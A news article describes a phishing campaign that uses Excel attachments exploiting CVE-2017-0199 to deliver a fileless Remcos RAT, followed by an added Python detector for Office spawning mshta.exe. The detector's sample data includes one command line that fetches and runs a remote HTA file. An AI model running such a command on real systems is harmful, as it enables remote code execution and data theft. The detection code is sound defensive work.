New malware has been discovered hiding in Excel files (check the Excel files in your emails)

  • November 12, 2024

A new malware that has become increasingly widespread in recent times is stored directly in Excel files. According to Fortinet research, malicious actors are spreading a fileless version of the Remcos Remote Access Trojan (RAT) using Excel documents. The goal of this new malware is, unsurprisingly, to capture users’ sensitive information.

The new attack method starts with phishing emails carrying fake purchase orders to get users’ attention. The email attachment is an Excel file that exploits a Microsoft Office vulnerability known as CVE-2017-0199.

How does the new attack method work?

When the file is opened, the exploit makes the system download an HTML Application (HTA) file from a remote server and launch it with the mshta.exe utility. That stage in turn fetches a second payload from the server; this payload uses anti-debugging and anti-analysis techniques to evade detection, and it is what installs the Remcos RAT.
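As an added example that is not part of the article or of Fortinet’s research: a small Python detector for the Office-to-mshta.exe process chain described above, run over constructed Sysmon-style process-creation records (the sample lines and the 203.0.113.10 address are invented for illustration).

```python
import re
from typing import Dict, List, Tuple

# Office hosts that should essentially never spawn a script host during normal use.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Parse a key="value" process-creation record into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (drops the directory part)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules this event trips (empty if nothing suspicious)."""
    hits: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if image != "mshta.exe":
        return hits
    if parent in OFFICE_PARENTS:          # the Excel -> mshta.exe chain from the article
        hits.append("office-spawns-mshta")
    if URL_RE.search(cmdline):            # HTA pulled from a remote server
        hits.append("mshta-remote-url")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Run every record through classify() and keep only those with findings."""
    findings = []
    for line in lines:
        rules = classify(parse_event(line))
        if rules:
            findings.append((line, rules))
    return findings


# Constructed sample records (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe http://203.0.113.10/order.hta"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe invoice.txt"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"',
]

if __name__ == "__main__":
    for line, rules in scan(SAMPLE_EVENTS):
        print(", ".join(rules), "->", parse_event(line)["CommandLine"])
```

Only the first record trips both rules; the third (mshta.exe launched from Explorer with a local file) is left alone, which keeps the rule focused on the chain the campaign actually uses.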

Remcos RAT was not originally developed as malware. It was created as a legitimate remote-administration tool, but, much like Cobalt Strike, it was adopted by malicious actors and turned to criminal use.

What can Remcos RAT do?

Today, Remcos serves as a tool for unauthorized access, data theft and espionage. On a computer infected with Remcos RAT, keystrokes can be logged, screenshots taken and commands executed.

The Remcos variant used in this campaign is fileless: Fortinet says the attackers load Remcos directly into the target device’s memory, which makes it hard to notice or detect.

Source: Web Tekno
